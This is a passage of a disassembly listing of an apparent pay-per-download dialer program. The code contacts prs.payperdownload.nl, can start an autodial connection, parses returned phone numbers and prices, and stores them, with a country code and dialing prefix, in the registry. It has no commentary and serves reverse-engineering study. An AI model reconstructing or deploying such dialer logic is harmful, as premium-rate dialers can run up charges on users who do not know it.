mov [esp+920h+var_8F8], edx
mov byte ptr [esp+edx+920h+var_8B4], 0
mov ecx, ebp
mov edx, ecx
shr ecx, 2
lea esi, [esp+920h+var_840]
lea edi, [esp+920h+var_860]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, ebx
mov edx, ecx
shr ecx, 2
lea esi, [esp+920h+var_8F0]
lea edi, [esp+920h+var_8E4]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, eax
mov edx, ecx
shr ecx, 2
lea esi, [esp+920h+var_820]
lea edi, [esp+920h+var_8A0]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov [esp+920h+var_8F4], ebp
mov [esp+ebp+920h+var_860], 0
mov ebp, [esp+920h+var_8D8]
mov ecx, ebp
mov [esp+920h+var_8FC], eax
mov [esp+eax+920h+var_8A0], 0
mov eax, ecx
shr ecx, 2
lea esi, [esp+920h+var_88C]
lea edi, [esp+920h+var_840]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+920h+var_8DC]
mov byte ptr [esp+ebx+920h+var_8E4], 0
mov [esp+ebp+920h+var_840], 0
mov byte ptr [esp+ecx+920h+var_8F0], 0
loc_406DF1: ; CODE XREF: sub_4066F0+5A6�j
; sub_4066F0+5B2�j ...
mov esi, [esp+920h+var_8F8]
xor eax, eax
cmp esi, eax
jle loc_406F85
mov edi, [esp+920h+var_8C4]
mov edx, [edi+20h]
push 71h
push edx
lea ecx, [esp+928h+var_88C]
mov [esp+928h+var_88C], eax
mov [esp+928h+var_888], eax
mov [esp+928h+var_884], eax
mov [esp+928h+var_880], al
mov [esp+928h+var_862], al
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+924h+var_88C]
call sub_402310
mov eax, [edi+20h]
push 7Ah
push eax
lea ecx, [esp+928h+var_88C]
call sub_40A1E0
lea ecx, [esp+920h+var_8C4]
push ecx
lea edx, [esp+924h+var_900]
push edx
push 0
push 0F003Fh
push 0
push 0
push 0
lea ecx, [esp+93Ch+var_88C]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jnz loc_406F22
mov ecx, [esp+918h+var_8F8]
push esi
mov esi, ds:dword_40F010
lea eax, [esp+91Ch+var_8AC]
push eax
push 1
push 0
push offset aPhonenumber1 ; "phonenumber1"
push ecx
call esi ; RegSetValueExA
mov edx, [esp+918h+var_8F4]
mov ecx, [esp+918h+var_8F8]
push edx
lea eax, [esp+91Ch+var_898]
push eax
push 1
push 0
push offset aPhonenumber2 ; "phonenumber2"
push ecx
call esi ; RegSetValueExA
mov edx, [esp+918h+var_8EC]
mov ecx, [esp+918h+var_8F8]
push edx
lea eax, [esp+91Ch+var_858]
push eax
push 1
push 0
push offset aPrice1 ; "price1"
push ecx
call esi ; RegSetValueExA
mov eax, [esp+918h+var_8F8]
push ebp
lea edx, [esp+91Ch+var_838]
push edx
push 1
push 0
push offset aPrice2 ; "price2"
push eax
call esi ; RegSetValueExA
mov edx, [esp+918h+var_8F8]
push ebx
lea ecx, [esp+91Ch+var_8DC]
push ecx
push 1
push 0
push offset aCc ; "cc"
push edx
call esi ; RegSetValueExA
mov eax, [esp+918h+var_8F8]
push eax
call ds:dword_40F020 ; RegCloseKey
loc_406F22: ; CODE XREF: sub_4066F0+79C�j
lea ecx, [esp+918h+var_8AC]
push ecx
lea esi, [edi+24h]
push 1
mov ecx, esi
call sub_408EE0
lea edx, [esp+918h+var_898]
push edx
push 2
mov ecx, esi
call sub_408EE0
lea ecx, [esp+918h+var_884]
xor esi, esi
call sub_401D10
mov eax, [esp+918h+var_8B4]
push eax
call ds:dword_40F240 ; InternetCloseHandle
mov ecx, [esp+91Ch+var_8B4]
push ecx
call ds:dword_40F240 ; InternetCloseHandle
pop ebp
pop ebx
pop edi
mov eax, esi
pop esi
add esp, 910h
retn
; ---------------------------------------------------------------------------
loc_406F75: ; CODE XREF: sub_4066F0+183�j
pop ebp
pop ebx
pop edi
mov eax, 0FFFFFFFDh
pop esi
add esp, 910h
retn
; ---------------------------------------------------------------------------
loc_406F85: ; CODE XREF: sub_4066F0+709�j
mov esi, 0FFFFFFFDh
loc_406F8A: ; CODE XREF: sub_4066F0+AC�j
; sub_4066F0+B8�j
mov eax, [esp+920h+var_8BC]
push eax
call ds:dword_40F240 ; InternetCloseHandle
mov ecx, [esp+920h+var_8B8]
push ecx
call ds:dword_40F240 ; InternetCloseHandle
pop ebp
pop ebx
pop edi
mov eax, esi
pop esi
add esp, 910h
retn
; ---------------------------------------------------------------------------
loc_406FAD: ; CODE XREF: sub_4066F0+86�j
mov ecx, [esp+91Ch+var_8B4]
push ecx
mov esi, 0FFFFFFFEh
call ds:dword_40F240 ; InternetCloseHandle
pop ebp
pop ebx
pop edi
mov eax, esi
pop esi
add esp, 910h
retn
; ---------------------------------------------------------------------------
loc_406FCA: ; CODE XREF: sub_4066F0+28�j
; sub_4066F0+45�j ...
pop edi
or eax, 0FFFFFFFFh
pop esi
add esp, 910h
retn
sub_4066F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_406FE0(char *Str1)
sub_406FE0 proc near ; CODE XREF: sub_408350+30B�p
; sub_408350+317�p
var_C89 = byte ptr -0C89h
var_C88 = byte ptr -0C88h
var_C87 = byte ptr -0C87h
var_C86 = byte ptr -0C86h
var_C85 = byte ptr -0C85h
var_C84 = dword ptr -0C84h
var_C7E = byte ptr -0C7Eh
var_C7D = byte ptr -0C7Dh
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = byte ptr -0C60h
var_C5C = byte ptr -0C5Ch
var_C4C = dword ptr -0C4Ch
var_C48 = dword ptr -0C48h
var_C44 = dword ptr -0C44h
var_C40 = byte ptr -0C40h
var_C22 = byte ptr -0C22h
var_C20 = byte ptr -0C20h
var_C1C = byte ptr -0C1Ch
var_C00 = byte ptr -0C00h
Str2 = byte ptr -800h
var_7FC = byte ptr -7FCh
Str1 = dword ptr 4
sub esp, 0C8Ch
push ebp
push esi
mov esi, ds:dword_40F250
push edi
xor ebp, ebp
push ebp
push 1
mov edi, ecx
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
mov [esp+0CA4h+var_C78], edi
call esi ; InternetCheckConnectionA
test eax, eax
jnz short loc_40702B
mov al, [edi+58h]
test al, al
jnz loc_40752E
push ebp
push 2
call ds:dword_40F24C ; InternetAutodial
push ebp
push 1
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
call esi ; InternetCheckConnectionA
test eax, eax
jz loc_40752E
loc_40702B: ; CODE XREF: sub_406FE0+23�j
push ebx
push ebp
push ebp
push ebp
push ebp
push offset aDel ; "del"
call ds:dword_40F248 ; InternetOpenA
mov ebx, eax
cmp ebx, ebp
mov [esp+0C9Ch+var_C6C], ebx
jnz short loc_407055
pop ebx
pop edi
pop esi
or eax, 0FFFFFFFFh
pop ebp
add esp, 0C8Ch
retn 4
; ---------------------------------------------------------------------------
loc_407055: ; CODE XREF: sub_406FE0+63�j
mov ecx, 10h
mov esi, offset aHttpPrs_payp_1 ; "http://prs.payperdownload.nl/radius/dia"...
lea edi, [esp+0C9Ch+var_C00]
lea eax, [esp+0C9Ch+var_C00]
rep movsd
lea edx, [eax+1]
loc_407072: ; CODE XREF: sub_406FE0+97�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_407072
mov ecx, [esp+0C9Ch+Str1]
sub eax, edx
lea edx, [esp+eax+0C9Ch+var_C00]
sub edx, ecx
jmp short loc_407090
; ---------------------------------------------------------------------------
align 10h
loc_407090: ; CODE XREF: sub_406FE0+AB�j
; sub_406FE0+B8�j
mov al, [ecx]
mov [edx+ecx], al
inc ecx
test al, al
jnz short loc_407090
push ebp
push ebp
push ebp
push ebp
lea eax, [esp+0CACh+var_C00]
push eax
push ebx
call ds:dword_40F244 ; InternetOpenUrlA
mov esi, eax
cmp esi, ebp
mov [esp+0C98h+var_C6C], esi
jz loc_407513
lea ecx, [esp+0C98h+var_C70]
push ecx
push 800h
lea edx, [esp+0CA0h+var_7FC]
push edx
push esi
mov edi, 0FFFFFFFDh
call ds:dword_40F254 ; InternetReadFile
test eax, eax
jz loc_4074F6
mov eax, [esp+0C9Ch+var_C74]
cmp eax, ebp
jz loc_4074F6
xor bl, bl
xor edx, edx
xor esi, esi
cmp eax, ebp
mov [esp+eax+0C9Ch+Str2], 0
mov [esp+0C9Ch+var_C87], 0
mov [esp+0C9Ch+var_C88], 0
mov [esp+0C9Ch+var_C86], 0
mov [esp+0C9Ch+var_C7E], 0
mov [esp+0C9Ch+var_C7D], 0
mov [esp+0C9Ch+var_C89], 0
mov [esp+0C9Ch+var_C85], bl
mov [esp+0C9Ch+var_C84], edx
mov [esp+0C9Ch+var_C64], ebp
mov [esp+0C9Ch+var_C7C], ebp
mov [esp+0C9Ch+var_C68], ebp
jbe loc_4072E0
mov ebp, 1
lea edi, [esp+0C9Ch+Str2]
loc_407141: ; CODE XREF: sub_406FE0+2FA�j
mov al, [esp+0C9Ch+var_C85]
test al, al
jnz loc_4072E0
movsx eax, byte ptr [edi]
sub eax, 22h
jz loc_40728E
sub eax, 1Ah
jz loc_407287
sub eax, 2
jz loc_40725F
cmp esi, 7D0h
ja loc_40742D
mov al, [esp+0C9Ch+var_C86]
test al, al
jz short loc_4071EB
push 0Bh ; MaxCount
push edi ; Str2
push offset Str1 ; "callrecords"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4071A6
add esi, 0Ah
add edi, 0Ah
mov [esp+0C9Ch+var_C87], 1
add ebp, 0Ah
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_4071A6: ; CODE XREF: sub_406FE0+1B1�j
push 0Ch ; MaxCount
push edi ; Str2
push offset aCallrecords_0 ; "/callrecords"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4071C4
mov [esp+0C9Ch+var_C85], 1
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_4071C4: ; CODE XREF: sub_406FE0+1D8�j
push 4 ; MaxCount
push edi ; Str2
push offset aCall ; "call"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4071EB
add esi, 3
add edi, 3
mov [esp+0C9Ch+var_C88], 1
add ebp, 3
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_4071EB: ; CODE XREF: sub_406FE0+19D�j
; sub_406FE0+1F6�j
mov al, [esp+0C9Ch+var_C88]
test al, al
jz loc_4072CD
push 0Ah ; MaxCount
push edi ; Str2
push offset aRealnumber ; "realnumber"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40722C
mov [esp+0C9Ch+var_C89], al
mov al, [esp+0C9Ch+var_C7E]
test al, al
jnz short loc_40721C
mov [esp+0C9Ch+var_C89], 1
loc_40721C: ; CODE XREF: sub_406FE0+235�j
xor bl, bl
add esi, 9
add edi, 9
add ebp, 9
jmp loc_4072CD
; ---------------------------------------------------------------------------
loc_40722C: ; CODE XREF: sub_406FE0+229�j
push 5 ; MaxCount
push edi ; Str2
push offset aPrice ; "price"
call _strncmp
add esp, 0Ch
test eax, eax
jnz loc_4072CD
mov [esp+0C9Ch+var_C89], al
mov al, [esp+0C9Ch+var_C7D]
xor bl, bl
test al, al
jnz short loc_407254
mov bl, 1
loc_407254: ; CODE XREF: sub_406FE0+270�j
add esi, 4
add edi, 4
add ebp, 4
jmp short loc_4072CD
; ---------------------------------------------------------------------------
loc_40725F: ; CODE XREF: sub_406FE0+185�j
mov al, [esp+0C9Ch+var_C87]
test al, al
jz short loc_407273
mov [esp+0C9Ch+var_C87], 0
mov [esp+0C9Ch+var_C86], 0
jmp short loc_4072CD
; ---------------------------------------------------------------------------
loc_407273: ; CODE XREF: sub_406FE0+285�j
mov al, [esp+0C9Ch+var_C88]
test al, al
jz short loc_407280
mov [esp+0C9Ch+var_C88], 0
loc_407280: ; CODE XREF: sub_406FE0+299�j
mov [esp+0C9Ch+var_C86], 0
jmp short loc_4072CD
; ---------------------------------------------------------------------------
loc_407287: ; CODE XREF: sub_406FE0+17C�j
mov [esp+0C9Ch+var_C86], 1
jmp short loc_4072CD
; ---------------------------------------------------------------------------
loc_40728E: ; CODE XREF: sub_406FE0+173�j
mov al, [esp+0C9Ch+var_C89]
test al, al
jz short loc_4072B0
test edx, edx
jle short loc_4072AA
mov [esp+0C9Ch+var_C89], 0
mov [esp+0C9Ch+var_C7E], 1
mov [esp+0C9Ch+var_C64], esi
jmp short loc_4072CD
; ---------------------------------------------------------------------------
loc_4072AA: ; CODE XREF: sub_406FE0+2B8�j
mov [esp+0C9Ch+var_C84], ebp
jmp short loc_4072CD
; ---------------------------------------------------------------------------
loc_4072B0: ; CODE XREF: sub_406FE0+2B4�j
test bl, bl
jz short loc_4072CD
mov eax, [esp+0C9Ch+var_C7C]
test eax, eax
jle short loc_4072C9
xor bl, bl
mov [esp+0C9Ch+var_C7D], 1
mov [esp+0C9Ch+var_C68], esi
jmp short loc_4072CD
; ---------------------------------------------------------------------------
loc_4072C9: ; CODE XREF: sub_406FE0+2DA�j
mov [esp+0C9Ch+var_C7C], ebp
loc_4072CD: ; CODE XREF: sub_406FE0+1C1�j
; sub_406FE0+1DF�j ...
mov eax, [esp+0C9Ch+var_C74]
mov edx, [esp+0C9Ch+var_C84]
inc esi
inc edi
inc ebp
cmp esi, eax
jb loc_407141
loc_4072E0: ; CODE XREF: sub_406FE0+14F�j
; sub_406FE0+167�j
mov ebx, [esp+0C9Ch+var_C64]
sub ebx, edx
cmp ebx, 13h
mov ecx, 13h
jg short loc_4072F2
mov ecx, ebx
loc_4072F2: ; CODE XREF: sub_406FE0+30E�j
mov ebp, [esp+0C9Ch+var_C68]
mov eax, ecx
shr ecx, 2
lea esi, [esp+edx+0C9Ch+Str2]
lea edi, [esp+0C9Ch+var_C60]
rep movsd
mov ecx, eax
mov eax, [esp+0C9Ch+var_C7C]
and ecx, 3
sub ebp, eax
cmp ebp, 27h
rep movsb
mov [esp+ebx+0C9Ch+var_C60], 0
mov ecx, 27h
jg short loc_407326
mov ecx, ebp
loc_407326: ; CODE XREF: sub_406FE0+342�j
mov edx, ecx
shr ecx, 2
lea esi, [esp+eax+0C9Ch+Str2]
lea edi, [esp+0C9Ch+var_C20]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor esi, esi
cmp ebx, esi
mov [esp+ebp+0C9Ch+var_C20], 0
jle loc_4074E9
mov edi, [esp+0C9Ch+var_C78]
mov eax, [edi+20h]
push 71h
push eax
lea ecx, [esp+0CA4h+var_C4C]
mov [esp+0CA4h+var_C4C], esi
mov [esp+0CA4h+var_C48], esi
mov [esp+0CA4h+var_C44], esi
mov [esp+0CA4h+var_C40], 0
mov [esp+0CA4h+var_C22], 0
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+0CA0h+var_C4C]
call sub_402310
mov ecx, [edi+20h]
push 7Ah
push ecx
lea ecx, [esp+0CA4h+var_C4C]
call sub_40A1E0
mov edx, [esp+0C9Ch+Str1]
push 2 ; MaxCount
push offset aXx_0 ; "xx"
push edx ; Str1
call _strncmp
add esp, 0Ch
test eax, eax
jnz loc_40743F
lea eax, [esp+0C9Ch+var_C78]
push eax
lea ecx, [esp+0CA0h+var_C84]
push ecx
push esi
push 0F003Fh
push esi
push esi
push esi
lea ecx, [esp+0CB8h+var_C4C]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jnz short loc_407421
mov eax, [esp+18h]
push ebx
lea edx, [esp+0C9Ch+var_C5C]
push edx
push 1
push esi
mov esi, ds:dword_40F010
push offset aPhonenumber2 ; "phonenumber2"
push eax
call esi ; RegSetValueExA
mov edx, [esp+18h]
push ebp
lea ecx, [esp+0C9Ch+var_C1C]
push ecx
push 1
push 0
push offset aPrice2 ; "price2"
push edx
call esi ; RegSetValueExA
mov eax, [esp+18h]
push eax
call ds:dword_40F020 ; RegCloseKey
loc_407421: ; CODE XREF: sub_406FE0+400�j
lea ecx, [esp+0C98h+var_C5C]
push ecx
push 2
jmp loc_4074B1
; ---------------------------------------------------------------------------
loc_40742D: ; CODE XREF: sub_406FE0+191�j
pop ebx
pop edi
pop esi
mov eax, 0FFFFFFFDh
pop ebp
add esp, 0C8Ch
retn 4
; ---------------------------------------------------------------------------
loc_40743F: ; CODE XREF: sub_406FE0+3D0�j
lea edx, [esp+0C9Ch+var_C78]
push edx
lea eax, [esp+0CA0h+var_C84]
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
lea ecx, [esp+0CB8h+var_C4C]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jnz short loc_4074AA
mov edx, [esp+18h]
push ebx
lea ecx, [esp+0C9Ch+var_C5C]
push ecx
push 1
push esi
mov esi, ds:dword_40F010
push offset aPhonenumber1 ; "phonenumber1"
push edx
call esi ; RegSetValueExA
mov ecx, [esp+18h]
push ebp
lea eax, [esp+0C9Ch+var_C1C]
push eax
push 1
push 0
push offset aPrice1 ; "price1"
push ecx
call esi ; RegSetValueExA
mov edx, [esp+18h]
push edx
call ds:dword_40F020 ; RegCloseKey
loc_4074AA: ; CODE XREF: sub_406FE0+489�j
lea eax, [esp+0C98h+var_C5C]
push eax
push 1
loc_4074B1: ; CODE XREF: sub_406FE0+448�j
lea ecx, [edi+24h]
call sub_408EE0
lea ecx, [esp+0C98h+var_C48]
xor edi, edi
call sub_401D10
mov esi, [esp+0C98h+var_C6C]
mov ebx, [esp+0C98h+var_C68]
push esi
call ds:dword_40F240 ; InternetCloseHandle
push ebx
call ds:dword_40F240 ; InternetCloseHandle
pop ebx
mov eax, edi
pop edi
pop esi
pop ebp
add esp, 0C8Ch
retn 4
; ---------------------------------------------------------------------------
loc_4074E9: ; CODE XREF: sub_406FE0+368�j
mov esi, [esp+0C9Ch+var_C70]
mov ebx, [esp+0C9Ch+var_C6C]
mov edi, 0FFFFFFFDh
loc_4074F6: ; CODE XREF: sub_406FE0+FB�j
; sub_406FE0+107�j
push esi
call ds:dword_40F240 ; InternetCloseHandle
push ebx
call ds:dword_40F240 ; InternetCloseHandle
pop ebx
mov eax, edi
pop edi
pop esi
pop ebp
add esp, 0C8Ch
retn 4
; ---------------------------------------------------------------------------
loc_407513: ; CODE XREF: sub_406FE0+D5�j
push ebx
mov edi, 0FFFFFFFEh
call ds:dword_40F240 ; InternetCloseHandle
pop ebx
mov eax, edi
pop edi
pop esi
pop ebp
add esp, 0C8Ch
retn 4
; ---------------------------------------------------------------------------
loc_40752E: ; CODE XREF: sub_406FE0+2A�j
; sub_406FE0+45�j
pop edi
pop esi
or eax, 0FFFFFFFFh
pop ebp
add esp, 0C8Ch
retn 4
sub_406FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407540 proc near ; CODE XREF: sub_407AF0+64�p
var_33C = dword ptr -33Ch
Count = dword ptr -338h
var_334 = byte ptr -334h
var_330 = dword ptr -330h
Memory = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = byte ptr -324h
var_306 = byte ptr -306h
var_304 = byte ptr -304h
var_300 = byte ptr -300h
Dest = byte ptr -200h
Source = byte ptr -100h
sub esp, 33Ch
push ebx
push ebp
push esi
push edi
lea eax, [esp+34Ch+var_33C]
push eax
push 20019h
mov edi, ecx
mov ecx, off_4120C0
xor ebx, ebx
push ebx
push ecx
push 80000001h
call ds:dword_40F00C ; RegOpenKeyExA
test eax, eax
mov ebp, ds:dword_40F020
jnz loc_40765C
mov ecx, off_4120C4
mov esi, ds:dword_40F01C
lea edx, [esp+34Ch+Count]
push edx
mov edx, [esp+350h+var_33C]
push ebx
lea eax, [esp+354h+var_334]
push eax
push ebx
push ecx
push edx
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_4075E7
lea eax, [esp+34Ch+Count]
push eax
mov eax, off_4120C4
lea ecx, [esp+350h+Source]
push ecx
mov ecx, [esp+354h+var_33C]
lea edx, [esp+354h+var_334]
push edx
push ebx
push eax
push ecx
call esi ; RegQueryValueExA
mov edx, [esp+34Ch+Count]
push edx ; Count
lea eax, [esp+350h+Source]
push eax ; Source
lea ecx, [esp+354h+Dest]
push ecx ; Dest
call _strncpy
mov edx, [esp+358h+Count]
add esp, 0Ch
mov [esp+edx+34Ch+Dest], bl
jmp short loc_4075EE
; ---------------------------------------------------------------------------
loc_4075E7: ; CODE XREF: sub_407540+5B�j
mov [esp+34Ch+Dest], bl
loc_4075EE: ; CODE XREF: sub_407540+A5�j
mov edx, off_4120C8
lea eax, [esp+34Ch+Count]
push eax
mov eax, [esp+350h+var_33C]
push ebx
lea ecx, [esp+354h+var_334]
push ecx
push ebx
push edx
push eax
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_407651
lea ecx, [esp+34Ch+Count]
push ecx
mov ecx, off_4120C8
lea edx, [esp+350h+Source]
push edx
mov edx, [esp+354h+var_33C]
lea eax, [esp+354h+var_334]
push eax
push ebx
push ecx
push edx
call esi ; RegQueryValueExA
mov eax, [esp+34Ch+Count]
push eax ; Count
lea ecx, [esp+350h+Source]
push ecx ; Source
lea edx, [esp+354h+var_300]
push edx ; Dest
call _strncpy
mov eax, [esp+358h+Count]
add esp, 0Ch
mov [esp+eax+34Ch+var_300], bl
jmp short loc_407655
; ---------------------------------------------------------------------------
loc_407651: ; CODE XREF: sub_407540+CA�j
mov [esp+34Ch+var_300], bl
loc_407655: ; CODE XREF: sub_407540+10F�j
mov ecx, [esp+34Ch+var_33C]
push ecx
call ebp ; RegCloseKey
loc_40765C: ; CODE XREF: sub_407540+33�j
mov edx, [edi+20h]
push 71h
push edx
lea ecx, [esp+354h+var_330]
mov [esp+354h+var_330], ebx
mov [esp+354h+Memory], ebx
mov [esp+354h+var_328], ebx
mov [esp+354h+var_324], bl
mov [esp+354h+var_306], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+350h+var_330]
call sub_402310
mov eax, [edi+20h]
push 7Ah
push eax
lea ecx, [esp+354h+var_330]
call sub_40A1E0
lea ecx, [esp+34Ch+var_304]
push ecx
lea edx, [esp+350h+var_33C]
push edx
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
lea ecx, [esp+368h+var_330]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jnz short loc_40771C
mov esi, ds:dword_40F084
lea eax, [esp+34Ch+Dest]
push eax
call esi ; lstrlen
mov edx, off_4120C4
mov edi, ds:dword_40F010
push eax
mov eax, [esp+350h+var_33C]
lea ecx, [esp+350h+Dest]
push ecx
push 1
push ebx
push edx
push eax
call edi ; RegSetValueExA
lea ecx, [esp+34Ch+var_300]
push ecx
call esi ; lstrlen
mov ecx, [esp+34Ch+var_33C]
push eax
mov eax, off_4120C8
lea edx, [esp+350h+var_300]
push edx
push 1
push ebx
push eax
push ecx
call edi ; RegSetValueExA
mov edx, [esp+34Ch+var_33C]
push edx
call ebp ; RegCloseKey
loc_40771C: ; CODE XREF: sub_407540+186�j
mov eax, [esp+34Ch+Memory]
cmp eax, ebx
jz short loc_407731
push eax ; Memory
call _free
add esp, 4
mov [esp+34Ch+Memory], ebx
loc_407731: ; CODE XREF: sub_407540+1E2�j
mov eax, [esp+34Ch+var_330]
push eax
call ds:dword_40F194
pop edi
pop esi
pop ebp
pop ebx
add esp, 33Ch
retn
sub_407540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407750 proc near ; CODE XREF: sub_407AA0+3A�p
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
Memory = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_2 = byte ptr -2
arg_0 = dword ptr 4
sub esp, 34h
push ebx
push esi
mov esi, ecx
mov eax, [esi+20h]
xor ebx, ebx
push 71h
push eax
lea ecx, [esp+44h+var_2C]
mov [esp+44h+var_2C], ebx
mov [esp+44h+Memory], ebx
mov [esp+44h+var_24], ebx
mov byte ptr [esp+44h+var_20], bl
mov [esp+44h+var_2], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+40h+var_2C]
call sub_402310
mov ecx, [esi+20h]
push 7Ah
push ecx
lea ecx, [esp+44h+var_2C]
call sub_40A1E0
lea edx, [esp+3Ch+var_30]
push edx
lea eax, [esp+40h+var_34]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
lea ecx, [esp+58h+var_2C]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jnz short loc_4077EA
mov ecx, [esp+3Ch+arg_0]
mov edx, [esp+3Ch+var_34]
push 0Ah
push ecx
push 1
push ebx
push offset aPrefix ; "Prefix"
push edx
call ds:dword_40F010 ; RegSetValueExA
mov eax, [esp+3Ch+var_34]
push eax
call ds:dword_40F020 ; RegCloseKey
loc_4077EA: ; CODE XREF: sub_407750+73�j
mov eax, [esp+3Ch+Memory]
cmp eax, ebx
jz short loc_4077FF
push eax ; Memory
call _free
add esp, 4
mov [esp+3Ch+Memory], ebx
loc_4077FF: ; CODE XREF: sub_407750+A0�j
mov ecx, [esp+3Ch+var_2C]
push ecx
call ds:dword_40F194
pop esi
pop ebx
add esp, 34h
retn 4
sub_407750 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407820 proc near ; CODE XREF: sub_407D40+5AF�p
Count = dword ptr -248h
var_244 = dword ptr -244h
var_240 = byte ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
Memory = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_206 = byte ptr -206h
var_204 = dword ptr -204h
Dest = byte ptr -200h
Source = byte ptr -100h
sub esp, 248h
push ebx
push esi
mov esi, ecx
mov eax, [esi+20h]
xor ebx, ebx
push 71h
push eax
lea ecx, [esp+258h+var_230]
mov [esp+258h+var_230], ebx
mov [esp+258h+Memory], ebx
mov [esp+258h+var_228], ebx
mov [esp+258h+var_224], bl
mov [esp+258h+var_206], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+254h+var_230]
call sub_402310
mov ecx, [esi+20h]
push 7Ah
push ecx
lea ecx, [esp+258h+var_230]
call sub_40A1E0
lea edx, [esp+250h+var_244]
push edx
push 20019h
push ebx
lea ecx, [esp+25Ch+var_230]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F00C ; RegOpenKeyExA
test eax, eax
jnz short loc_407904
mov edx, [esp+250h+var_244]
mov esi, ds:dword_40F01C
lea eax, [esp+250h+Count]
push eax
push ebx
lea ecx, [esp+258h+var_240]
push ecx
push ebx
push offset aPrefix ; "Prefix"
push edx
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_4078F5
lea eax, [esp+250h+Count]
push eax
mov eax, [esp+254h+var_244]
lea ecx, [esp+254h+Source]
push ecx
lea edx, [esp+258h+var_240]
push edx
push ebx
push offset aPrefix ; "Prefix"
push eax
call esi ; RegQueryValueExA
mov ecx, [esp+250h+Count]
push ecx ; Count
lea edx, [esp+254h+Source]
push edx ; Source
lea eax, [esp+258h+Dest]
push eax ; Dest
call _strncpy
mov ecx, [esp+25Ch+Count]
add esp, 0Ch
mov [esp+ecx+250h+Dest], bl
jmp short loc_4078F9
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_407820+90�j
mov [esp+250h+Dest], bl
loc_4078F9: ; CODE XREF: sub_407820+D3�j
mov edx, [esp+250h+var_244]
push edx
call ds:dword_40F020 ; RegCloseKey
loc_407904: ; CODE XREF: sub_407820+6E�j
xor eax, eax
mov [esp+250h+var_23C], eax
mov [esp+250h+var_238], eax
mov word ptr [esp+250h+var_234], ax
lea eax, [esp+250h+Dest]
lea edx, [eax+1]
lea ebx, [ebx+0]
loc_407920: ; CODE XREF: sub_407820+105�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_407920
sub eax, edx
mov [esp+250h+var_204], eax
jz short loc_407943
push 0Ah ; Count
lea ecx, [esp+254h+Dest]
push ecx ; Source
lea edx, [esp+258h+var_23C]
push edx ; Dest
call _strncpy
add esp, 0Ch
loc_407943: ; CODE XREF: sub_407820+10D�j
mov ecx, dword_41252C
lea eax, [esp+250h+var_23C]
push eax
call sub_4096E0
mov eax, [esp+250h+Memory]
cmp eax, ebx
jz short loc_407968
push eax ; Memory
call _free
add esp, 4
mov [esp+250h+Memory], ebx
loc_407968: ; CODE XREF: sub_407820+139�j
mov ecx, [esp+250h+var_230]
push ecx
call ds:dword_40F194
pop esi
pop ebx
add esp, 248h
retn
sub_407820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407980 proc near ; CODE XREF: sub_407D40+14E�p
; sub_407D40:loc_407F1E�p
Count = dword ptr -238h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_22C = dword ptr -22Ch
Memory = dword ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_202 = byte ptr -202h
Dest = byte ptr -200h
Source = byte ptr -100h
sub esp, 238h
push ebx
push esi
mov esi, ecx
mov eax, [esi+20h]
xor ebx, ebx
push 71h
push eax
lea ecx, [esp+248h+var_22C]
mov [esp+248h+var_22C], ebx
mov [esp+248h+Memory], ebx
mov [esp+248h+var_224], ebx
mov [esp+248h+var_220], bl
mov [esp+248h+var_202], bl
